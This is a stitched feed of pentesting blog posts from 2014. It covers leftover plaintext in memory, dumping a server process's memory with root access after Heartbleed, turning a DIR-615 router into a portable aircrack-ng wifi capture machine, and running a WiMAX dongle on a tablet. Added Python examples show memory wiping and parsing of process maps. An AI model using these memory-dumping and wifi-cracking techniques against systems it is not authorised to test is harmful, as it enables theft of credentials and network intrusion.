<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0D3LgOry05lVqxyMSW1NpKeAGtMIYIHHiaIDyG4ziA1aP0NtSw4O6SSNP6poMoK8LaPnLA7IWA3-ytNrj9ujrtrRogcWL6-S4DU-JhNFYSOpLlR1MZxd8xvc9CjhdTCS90M2nreFeUj2b/s1600/capture5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0D3LgOry05lVqxyMSW1NpKeAGtMIYIHHiaIDyG4ziA1aP0NtSw4O6SSNP6poMoK8LaPnLA7IWA3-ytNrj9ujrtrRogcWL6-S4DU-JhNFYSOpLlR1MZxd8xvc9CjhdTCS90M2nreFeUj2b/s1600/capture5.PNG" height="288" width="320" /></a></div>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">The string was stored in a different address!!</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-5R17HGNQdg6FficIgaU7Zu9NyofP8gQK4Yuvzm33Ei1UOByI_8FTiw3GcWRe81Mtu8ATvRB0Mx38L2Ud9MTvg2HbTc8Zia7f6tLkSko_RLleQb08-aagVVRg-d0WbOKc2BiyrzETTyaF/s1600/Capture6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-5R17HGNQdg6FficIgaU7Zu9NyofP8gQK4Yuvzm33Ei1UOByI_8FTiw3GcWRe81Mtu8ATvRB0Mx38L2Ud9MTvg2HbTc8Zia7f6tLkSko_RLleQb08-aagVVRg-d0WbOKc2BiyrzETTyaF/s1600/Capture6.png" height="102" width="320" /></a></div>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">So in a high-level language, <i><b>there is no guarantee that your initial plaintext data at an address will be overwritten with an encrypted blob/binary. The only way to ensure the overwrite is 100% is to use a mutable data structure that is capable of replacing its elements in place</b>.</i></span><br />
<span style="background-color: white;"><i><br /></i></span>
<span style="background-color: white;">So why did you see a chunk of the unencrypted/encrypted data in the Heartbleed heap leak? Not a surprise anymore, right?</span><br />
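Added example, not the post's script: it contrasts the post's rebind-a-str pattern with the mutable alternative the conclusion calls for, reading the buffer back through its address to confirm the wipe. The function names are my own; DogFood is the post's sample password.

```python
import ctypes
import hashlib

# Added example, not the post's code (Python 3; the post's snippet is Python 2).


def hash_then_rebind_str(secret: str) -> dict:
    """The post's pattern. Rebinding the name does not touch the old object:
    the plaintext stays wherever CPython placed it until the object is freed
    and that memory happens to be reused, which the program cannot force."""
    old_addr = id(secret)
    secret = hashlib.md5(secret.encode()).hexdigest()  # the name now points elsewhere
    return {"old_addr": old_addr, "new_addr": id(secret), "digest": secret,
            "moved": old_addr != id(secret)}


def hash_then_wipe(secret: bytearray) -> tuple[str, bytes]:
    """Mutable alternative: hash the buffer, then overwrite it in place.

    Returns the digest and the raw bytes read back from the buffer's address
    after the wipe, so the caller can see that the same memory now holds zeros.
    Caveat: this only helps if the secret never existed as an immutable object
    (read it with sys.stdin.buffer.readinto or similar); any str or bytes copy
    made along the way is still out of reach."""
    digest = hashlib.md5(secret).hexdigest()          # bytearray supports the buffer protocol
    buf_addr = ctypes.addressof(ctypes.c_char.from_buffer(secret))
    secret[:] = b"\x00" * len(secret)                  # same length, so no reallocation
    return digest, ctypes.string_at(buf_addr, len(secret))


if __name__ == "__main__":
    print(hash_then_rebind_str("DogFood"))
    print(hash_then_wipe(bytearray(b"DogFood")))
```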
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<div>
<br /></div>
</div>
Epilogue Pentest: Forget about Heartbleed and Enter the Reality of Volatile Memory (2014-04-10)<div dir="ltr" style="text-align: left;" trbidi="on">
From <a href="http://xkcd.com/1353/">XKCD</a>..<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://imgs.xkcd.com/comics/heartbleed.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://imgs.xkcd.com/comics/heartbleed.png" height="132" width="320" /></a></div>
<br />
<br />
Yeah, there's a lot of buzz about Heartbleed <b>as the worst bug ever</b>. My opinion? It is <b>a serious bug</b>, due to the fallacy of the way C works. Despite the hype, memory leakage is not exactly something new, and skillful botnets/attackers/pentesters have exploited it for years.<br />
<br />
What can we learn from this bug? <b>At the beginning and at the end of an encrypted connection lies the encrypted data. Not trusting user input is one thing, but trusting your server memory and the hands behind it also, well, sucks.</b><br />
<b><br /></b>
If you are one of the CISO fans, well, PCI often says "<span style="background-color: #f3f3f3; font-family: verdana, arial, helvetica; font-size: 13px; text-align: center;"><b>End-to-End Encryption</b>", which means the data + the communication channel are supposed to be well encrypted. Which is good.</span><br />
<span style="background-color: #f3f3f3; font-family: verdana, arial, helvetica; font-size: 13px; text-align: center;"><br /></span>
<span style="background-color: #f3f3f3; font-family: verdana, arial, helvetica; font-size: 13px; text-align: center;">But there's one catch...</span><br />
<span style="background-color: #f3f3f3; font-family: verdana, arial, helvetica; font-size: 13px; text-align: center;"><br /></span>
<span style="background-color: #f3f3f3; text-align: center;"><span style="font-family: verdana, arial, helvetica; font-size: x-small;">Suppose an attacker/sysadmin managed to get hold of a server with privileged access (or decided to abuse it anyway). Hypothetically, something like this.</span></span><br />
<span style="background-color: #f3f3f3; text-align: center;"><span style="font-family: verdana, arial, helvetica; font-size: x-small;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAIRx9nWN1pDQeatHMaW2aSQvlTBqqhAP7kz47sAZhI2LyAnjXyd2Di95100blxvRH41ClrMBTa6iG77h-f9P_Vkyan6QTyJLzXnsHjjh2NyhMjYJG5yUHNM7ZGCpbJVZXEqM1jRWHzSJX/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAIRx9nWN1pDQeatHMaW2aSQvlTBqqhAP7kz47sAZhI2LyAnjXyd2Di95100blxvRH41ClrMBTa6iG77h-f9P_Vkyan6QTyJLzXnsHjjh2NyhMjYJG5yUHNM7ZGCpbJVZXEqM1jRWHzSJX/s1600/Capture.PNG" height="62" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
So we have root privileges. Yes, in most tutorials people will no doubt start dumping /etc/shadow and so on, setting up fake websites and the like.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Suppose that all data is encrypted and there's no way to see it in plaintext form. If you understand the bug in Heartbleed, it tells us that unencrypted related data lies in the process memory, close by in the heap/free store.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmYNf76QjUhFa2iI3JSBQ5wvmPSNUr0HZgwDcPDWGf_qyHIrXBjzBnNB8MuxdIxo3CN5nqnJ3mHj0F87H12S-0UkgGbbhdcT8zfSsnIhLQJK1Z3XhL0UMyB-VB-jiQ_tszH83hcQAx4I-i/s1600/capture2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmYNf76QjUhFa2iI3JSBQ5wvmPSNUr0HZgwDcPDWGf_qyHIrXBjzBnNB8MuxdIxo3CN5nqnJ3mHj0F87H12S-0UkgGbbhdcT8zfSsnIhLQJK1Z3XhL0UMyB-VB-jiQ_tszH83hcQAx4I-i/s1600/capture2.PNG" height="51" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Pick one process, 5356 in this example, and examine its maps.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrpll1hRL2erJ8uB_A2OscThj_eb6VGUbtt4x6UjhZbmKjxNTOz5mcG73WJ2Sap7shqT1aAc-TlqnPBFDJcrs9bUPVosoTX58V8q9Oy1XmNqpRCdVUIC8QRUmmHKUy6KGtdooIxYi60zZy/s1600/Capture3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrpll1hRL2erJ8uB_A2OscThj_eb6VGUbtt4x6UjhZbmKjxNTOz5mcG73WJ2Sap7shqT1aAc-TlqnPBFDJcrs9bUPVosoTX58V8q9Oy1XmNqpRCdVUIC8QRUmmHKUy6KGtdooIxYi60zZy/s1600/Capture3.PNG" height="176" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The data leaked in Heartbleed depends on how the heap was aligned/rebased/mapped and so on.</div>
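Added example (not the post's tooling): a small parser for the /proc/PID/maps format examined above that picks out the readable, writable anonymous regions (heap, malloc arenas, stack), which is where the kind of plaintext the post talks about lives. The maps lines are constructed for the example, as are the names.

```python
import re
from dataclasses import dataclass

# Added example, not the post's code. The lines below are constructed to resemble
# a /proc/PID/maps file; nothing is read from a real process.
CONSTRUCTED_MAPS = """\
00400000-004ef000 r-xp 00000000 08:01 1048602                            /usr/sbin/httpd
006ef000-006f1000 rw-p 000ef000 08:01 1048602                            /usr/sbin/httpd
01a2c000-01b5d000 rw-p 00000000 00:00 0                                  [heap]
7f3c1c000000-7f3c1c021000 rw-p 00000000 00:00 0
7f3c1c021000-7f3c20000000 ---p 00000000 00:00 0
7f3c24a00000-7f3c24bb4000 r-xp 00000000 08:01 393514                     /lib/x86_64-linux-gnu/libc-2.19.so
7ffd2b7e0000-7ffd2b801000 rw-p 00000000 00:00 0                          [stack]
"""

# start-end perms offset dev inode [path]; path is absent for unnamed mmap regions
MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>[rwxps-]{4})\s+"
    r"(?P<offset>[0-9a-f]+)\s+(?P<dev>[0-9a-f]+:[0-9a-f]+)\s+(?P<inode>\d+)\s*(?P<path>.*)$"
)


@dataclass(frozen=True)
class Region:
    start: int
    end: int
    perms: str
    path: str

    @property
    def size(self) -> int:
        return self.end - self.start

    @property
    def is_anonymous(self) -> bool:
        # No backing file: [heap], [stack], or an unnamed mmap such as a malloc arena.
        return self.path == "" or self.path.startswith("[")


def parse_maps(text: str) -> list[Region]:
    """Parse the text of a maps file into Region records; raises on a bad line."""
    regions = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if not m:
            raise ValueError(f"unparseable maps line: {line!r}")
        regions.append(Region(int(m["start"], 16), int(m["end"], 16),
                              m["perms"], m["path"].strip()))
    return regions


def live_data_regions(regions: list[Region]) -> list[Region]:
    """Readable and writable anonymous mappings: the heap, non-main malloc arenas
    (the unnamed rw-p region next to a ---p guard mapping is typical of glibc)
    and the stack. Code, file-backed data and guard pages are skipped; this is
    the part of a process image that a leak like Heartbleed draws from."""
    return [r for r in regions if r.perms.startswith("rw") and r.is_anonymous]


if __name__ == "__main__":
    for r in live_data_regions(parse_maps(CONSTRUCTED_MAPS)):
        print(f"{r.start:012x}-{r.end:012x} {r.perms} {r.size:>8} {r.path or '(anonymous)'}")
```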
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We can use gcore, or the <a href="http://www.rohitab.com/discuss/topic/37806-process-memory-dump-utility/">folks from Rohitab</a> have created one nice tool similar to procdump on Windows :)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtiHocUhL_O1glfkvjRUUH1NXcmo3r7OgS35j-BJKDOcoimrfraZRNt7ovJamujp35GoRYVomlEpNQArscwP0SPQgO061trgPAf4Eghk7b2RY-bUcL7yOYewTKsFdkDSjyD0jyQApDjjXX/s1600/Capture4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtiHocUhL_O1glfkvjRUUH1NXcmo3r7OgS35j-BJKDOcoimrfraZRNt7ovJamujp35GoRYVomlEpNQArscwP0SPQgO061trgPAf4Eghk7b2RY-bUcL7yOYewTKsFdkDSjyD0jyQApDjjXX/s1600/Capture4.PNG" height="25" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
And it's a gold mine..</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhScKKP-LitXq1WR1tsMCmPwLhhulmEyl7S3Kdp4NdayBrM2ToTjXAqY4bO2LO16C8lZj1YyAljcPKwDgxxGFFUOjbh45IP8PF10I2kzJJ2JMBBjK4c9_KWj0FHfMvchkoDYtZcxrAEpO58/s1600/capture6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhScKKP-LitXq1WR1tsMCmPwLhhulmEyl7S3Kdp4NdayBrM2ToTjXAqY4bO2LO16C8lZj1YyAljcPKwDgxxGFFUOjbh45IP8PF10I2kzJJ2JMBBjK4c9_KWj0FHfMvchkoDYtZcxrAEpO58/s1600/capture6.PNG" height="208" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
Do you trust your sysadmin? I know I don't. And a dark tip: <i>don't trust your router memory either...</i></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
What about dumping on Windows? It's as easy as this.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiddhZPu9d4MKzlp-GaJcfoFLcTJjVj4HKkfBHWW2doNx_ofdo57vYKgE-70BO7ZPeCWjygjIrkrpr2ZwfUDZJSxE4R6HM6WxrZcr4WcZayet2ixXc644sMV_51q2ZF8GoTxfFtRiP7ndx/s1600/Capture7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiddhZPu9d4MKzlp-GaJcfoFLcTJjVj4HKkfBHWW2doNx_ofdo57vYKgE-70BO7ZPeCWjygjIrkrpr2ZwfUDZJSxE4R6HM6WxrZcr4WcZayet2ixXc644sMV_51q2ZF8GoTxfFtRiP7ndx/s1600/Capture7.png" height="68" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Volatile memory is dangerous... </b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<b><br /></b></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-18052977188921258502014-04-06T15:58:00.003+08:002014-04-06T15:59:44.626+08:00Transform your Dir-615 TM into a Wifi Dumper/Cracking Machine<div dir="ltr" style="text-align: left;" trbidi="on">
My health has not been that good lately; for some reason I was diagnosed with asthma a few days ago. <div>
<br /></div>
<div>
During wireless penetration testing, I often find that people love to talk about China-brand wireless cards such as SignalKing/Alfa etc. While those cards might work, they are not portable enough, because you need a PC/notebook nearby to power them up, which is not good for the professional lazy pentester. </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i00.i.aliimg.com/wsphoto/v1/544601914_1/High-Power-SignalKing-font-b-Signal-b-font-font-b-King-b-font-48DBI-USB-font.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i00.i.aliimg.com/wsphoto/v1/544601914_1/High-Power-SignalKing-font-b-Signal-b-font-font-b-King-b-font-48DBI-USB-font.jpg" height="320" width="320" /></a> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9dYqo04MAwICIXin2O_PGjPdII1FXfzBW2kImcy2t0cTk7a2I3Qss5M15W2iJIfZVf057LLy2ViuhRaTMPxRZL0QtRyPhHVkM6JMyq1fKjbl9XY-viyPkzt47IowU_MvDeTLe5ou6mHs/s1600/Alfa_USB_500mw_Wifi_Adapter_Awus036h.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9dYqo04MAwICIXin2O_PGjPdII1FXfzBW2kImcy2t0cTk7a2I3Qss5M15W2iJIfZVf057LLy2ViuhRaTMPxRZL0QtRyPhHVkM6JMyq1fKjbl9XY-viyPkzt47IowU_MvDeTLe5ou6mHs/s1600/Alfa_USB_500mw_Wifi_Adapter_Awus036h.jpg" height="320" width="320" /></a></div>
<div>
<br /></div>
<div>
So the solution? Turn your antique DIR-615 into a portable wireless monster machine!!!</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwas-BwtC3FjVTTTdiXDuBeCcfm8r8wrxbHHRoMoG3WIOk1qWTzWmZ7TksMvIkbTNN7spvXZ1-vs9UBhJbrTBDJ2qHqpVzJXLnw_oLQh13RzNnKFL_iQPql66w9_IvZzbuG70VZxD0mrEV/s1600/photo+(6).JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwas-BwtC3FjVTTTdiXDuBeCcfm8r8wrxbHHRoMoG3WIOk1qWTzWmZ7TksMvIkbTNN7spvXZ1-vs9UBhJbrTBDJ2qHqpVzJXLnw_oLQh13RzNnKFL_iQPql66w9_IvZzbuG70VZxD0mrEV/s1600/photo+(6).JPG" height="276" width="320" /></a></div>
<div>
<br /></div>
<div>
Disclaimer: if you screw up somewhere along the way, well, too bad.</div>
<div>
<br /></div>
<div>
Step 1. Flash the DIR-615 with this firmware: <a href="http://downloads.openwrt.org/attitude_adjustment/12.09/ramips/rt305x/openwrt-ramips-rt305x-dir-615-d-squashfs-factory.bin">openwrt-ramips-rt305x-dir-615-d-squashfs-factory.bin</a></div>
<div>
<br /></div>
<div>
To flash, turn off your DIR-615 and hold the reset button for a few seconds, set your IP to 192.168.0.x (x &gt; 1), go to 192.168.0.1 and you will be redirected to the firmware upgrade page.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://studentprojects.files.wordpress.com/2011/09/ddwrt_guide1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://studentprojects.files.wordpress.com/2011/09/ddwrt_guide1.png" height="231" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
Upload the firmware.</div>
<div>
<br /></div>
<div>
Step 2.</div>
<div>
<ul style="text-align: left;">
<li>Download the sysupgrade firmware: <a href="http://downloads.openwrt.org/attitude_adjustment/12.09/ramips/rt305x/openwrt-ramips-rt305x-dir-620-a1-squashfs-sysupgrade.bin">openwrt-ramips-rt305x-dir-620-a1-squashfs-sysupgrade.bin</a></li>
<li>Set up OpenWrt initially.</li>
<li>Push the sysupgrade image onto OpenWrt via scp to /tmp.</li>
<li>ssh into your OpenWrt box and run <i>sysupgrade -v openwrt-ramips-rt305x-dir-620-a1-squashfs-sysupgrade.bin</i></li>
</ul>
<div>
<br /></div>
</div>
<div>
Step 3</div>
<div>
<ul style="text-align: left;">
<li>If you have LuCI you can set the wifi into monitor mode via the LuCI web UI.<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif5_IbffWED4acJ2cjlqdtle3uYECiR8kLjIGh9GaMFXNEPFgixA2u_f8XZGNVV2bYSsWxcLBOQCyOcNqH_GlOLIpgkVFGlMBrMYc9s6F3uk4URV167x629dFYLEUbHrbhSkfDGQjkfmOJ/s1600/capture6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif5_IbffWED4acJ2cjlqdtle3uYECiR8kLjIGh9GaMFXNEPFgixA2u_f8XZGNVV2bYSsWxcLBOQCyOcNqH_GlOLIpgkVFGlMBrMYc9s6F3uk4URV167x629dFYLEUbHrbhSkfDGQjkfmOJ/s1600/capture6.PNG" height="151" width="320" /></a></div>
</li>
<li>or modify /etc/config/wireless to be something like this<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPDfdI9sM1-H4KbLNwooIrTEcQOPxx-7J0ub6kzFNPYKztEIRw3FLziBF10-FXcxY1iPS-O9Bs6LokhTV1KAU4e0Lk0KScopP9EQ21m0YH1J2mOLB0_Kd2jJejEZRD6sENLX7_zwFybHWP/s1600/capturr7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPDfdI9sM1-H4KbLNwooIrTEcQOPxx-7J0ub6kzFNPYKztEIRw3FLziBF10-FXcxY1iPS-O9Bs6LokhTV1KAU4e0Lk0KScopP9EQ21m0YH1J2mOLB0_Kd2jJejEZRD6sENLX7_zwFybHWP/s1600/capturr7.png" height="233" width="320" /></a></div>
</li>
</ul>
</div>
<div>
<br /></div>
<div>
<ul style="text-align: left;">
<li>Tip: your OpenWrt box won't have an Internet connection. opkg relies on wget, which respects the http_proxy environment variable. I use a polipo proxy, so to make opkg work I usually run <i>ssh root@192.168.1.1 -R8123:localhost:8123</i>, which makes the proxy reachable from the router as localhost:8123 through the reverse tunnel. </li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5hlx2ivG746W8ldrfcGAK78hXX5FiuUp52WRLNRnAJf4Dps0EvloejsescKxi_GXhxc8YKupOY3JFP1t0Fu9ju5B2WCtBO512aNjkWIY2PZNEVTsHLpXj4fyaAUoR4P-TSN7tFZkoylzg/s1600/capture8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5hlx2ivG746W8ldrfcGAK78hXX5FiuUp52WRLNRnAJf4Dps0EvloejsescKxi_GXhxc8YKupOY3JFP1t0Fu9ju5B2WCtBO512aNjkWIY2PZNEVTsHLpXj4fyaAUoR4P-TSN7tFZkoylzg/s1600/capture8.png" height="156" width="320" /></a></div>
<div>
<br /></div>
</div>
<div>
After that, run <i>opkg install aircrack-ng kmod-usb-storage kmod-fs-vfat wireless-tools screen</i>. Try not to install too much stuff, since space is very <b>limited</b>.</div>
<div>
<br /></div>
<div>
And that's it. Use <i>screen</i> to daemonize your stuff.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0cJoRU2h_04xVV3LIQ1HTXAITNTvmHUIi-aXx-iqDifMf_t5BUZE8KXTusvYKSg9gaXlbJGWOYe4Xdjeeqoqt5uYAUw1gM-QYz9coxJS_trwbVAG9Yb68vry-lkbPTAGU-BhgH3u0lWQO/s1600/crap9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0cJoRU2h_04xVV3LIQ1HTXAITNTvmHUIi-aXx-iqDifMf_t5BUZE8KXTusvYKSg9gaXlbJGWOYe4Xdjeeqoqt5uYAUw1gM-QYz9coxJS_trwbVAG9Yb68vry-lkbPTAGU-BhgH3u0lWQO/s1600/crap9.png" height="105" width="320" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Dumping to your USB drive and aircrack-ng usage are left as an exercise for the reader..</div>
<div>
<br /></div>
<div>
By the way, <a href="http://www.thestar.com.my/news/nation/2013/09/13/it-is-illegal-to-ride-on-anothers-wifi-connection-says-mcmc.aspx">it is illegal to steal Wifi in Malaysia</a>. This is just a simple tutorial on how to build your own powerful portable wifi-pentesting machine.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-44289566826381364232014-03-19T00:41:00.002+08:002014-03-19T00:55:16.146+08:00Poor man Tablet Wimax Yes 4G... (Probably the first one in Malaysia)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: left;">
<i>Note: just because I criticized YES services doesn't mean that I hate them. In fact their network performance would make P(2-1) look like pea one.. But there's always room for improvement. After all, real hackers innovate, mutate, making bidaah hasanah for the greater good and fun.</i></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After the <a href="http://y0nd13.blogspot.com/2014/03/poor-man-yes4g-huddle.html">PoC of turning your Raspberry Pi into a full-blown Yes Zoom</a>, I was browsing one day to see what the YTL/Yes guys are up to.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYmUum5OYE7Swu1bIDRRUIxTlMu30gNtYCWyMZG8pRkIKLRz-CGNSWehAfFE7nnA_vjETZCW74499w6wnuxaNONa75qIntEod6RxQ2nNb4K-4wv6IJXfL3MJcCUzxHst2Z4s81InQCtfaE/s1600/poorr1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYmUum5OYE7Swu1bIDRRUIxTlMu30gNtYCWyMZG8pRkIKLRz-CGNSWehAfFE7nnA_vjETZCW74499w6wnuxaNONa75qIntEod6RxQ2nNb4K-4wv6IJXfL3MJcCUzxHst2Z4s81InQCtfaE/s1600/poorr1.png" height="127" width="320" /></a></div>
It's great that they are giving free (with conditional surrender/subscription) tablets to 99 lucky people. However, those tablets don't come with built-in WiMAX, which is a sad thing. We have 3G and 4G, but many capitalistic industrialists treat WiMAX as a foster child..<br />
<br />
So my favourite guru poisoned me with the idea: make it work with a tablet.<br />
<br />
<b>Hardware Requirement</b><br />
1. Samsung Galaxy Tab 10.1 P7500<br />
2. Yes4G Dongle<br />
3. OTG cable with external power (5V 2A); the type is explained later.<br />
<br />
1. You can use any ROM that you like, but my choice would be plain stock CyanogenMod with tun enabled and also access to libusb. This is important as gctwimax is a user-space driver.<br />
<br />
2. According to the <a href="http://www.usb.org/developers/onthego/otg1_0.pdf">OTG 1.0</a> specification, the plugged-in device may draw between 8mA and 100mA. The host can't supply more due to the design/current limit (on the Nexus 7 it's the kernel that enforces it)... And unfortunately the Yes4G dongle draws at least 500mA. We can verify this by going to Device Manager and checking the power.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnocdcAm3mEHfHlklez1-GdPV-0xeqTBo2NxTwnd6WhRTqtwDo7SOyMF7IHPoR-7wA_7VjIUQ9TjLUxenHo5vD6NV0FuuxqmVZgaIA4uLhyphenhyphenrtkhS7o1TBkAczBJnFo8M0KILntgyX7uSTX/s1600/poorr1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnocdcAm3mEHfHlklez1-GdPV-0xeqTBo2NxTwnd6WhRTqtwDo7SOyMF7IHPoR-7wA_7VjIUQ9TjLUxenHo5vD6NV0FuuxqmVZgaIA4uLhyphenhyphenrtkhS7o1TBkAczBJnFo8M0KILntgyX7uSTX/s1600/poorr1.png" height="320" width="288" /></a></div>
3. So yeah, we need an OTG cable with extra power; a simple powerbank should be sufficient.<br />
<br />
4. I'm using <a href="http://linuxonandroid.org/">linuxonandroid</a> to ease the development. Compiling gctwimax is straightforward once you chroot into it, but a problem occurs when you try to run the gctwimax dialer.<br />
<br />
5. The solution that I used is one hell of a bad hack.<br />
<br />
<pre># $bbox is the busybox binary, $mnt the chroot mount point
# expose the host USB bus inside the chroot so libusb can see the dongle
$bbox mount --bind /dev/bus $mnt/dev/bus
# create the tun device node (major 10, minor 200) inside the chroot
$bbox mknod $mnt/dev/net/tun c 10 200</pre>
<div>
<br /></div>
<div>
6. You also need to run <i>dhcpcd wimax0</i> outside of the chroot environment. If necessary, the DNS server can be set using the setprop command.. If everything goes well, congratulations, you are one of the luckiest bast&amp;^ds using WiMAX on a tablet natively.</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
